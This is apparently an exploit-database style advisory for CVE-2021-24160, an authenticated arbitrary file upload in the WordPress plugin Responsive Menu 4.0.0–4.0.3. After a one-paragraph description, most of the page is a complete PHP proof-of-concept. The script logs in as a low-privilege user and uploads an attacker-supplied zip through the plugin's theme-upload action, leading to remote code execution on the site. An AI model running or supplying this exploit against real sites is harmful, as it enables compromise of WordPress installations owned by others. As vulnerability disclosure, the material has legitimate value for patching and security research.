Responsive Menu 4.0.0 – 4.0.3 – Authenticated Arbitrary File Upload | CVE 2021-24160

Description

"A subscriber could upload zip archives containing malicious PHP files that would get extracted to the /rmp-menu/themes/ directory. These files could then be accessed via the front end of the site to trigger remote code execution and ultimately allow an attacker to execute commands to further infect a WordPress site."

Proof of Concept

<?php

// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
$upfile = $argv[4];


// 1) Log in as customer
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Update Settings
$ch = curl_init();
$cFile = curl_file_create( realpath( $upfile ) );
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-post.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
   'action' => 'rmp_upload_theme_file',
   'file' => $cFile,
]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>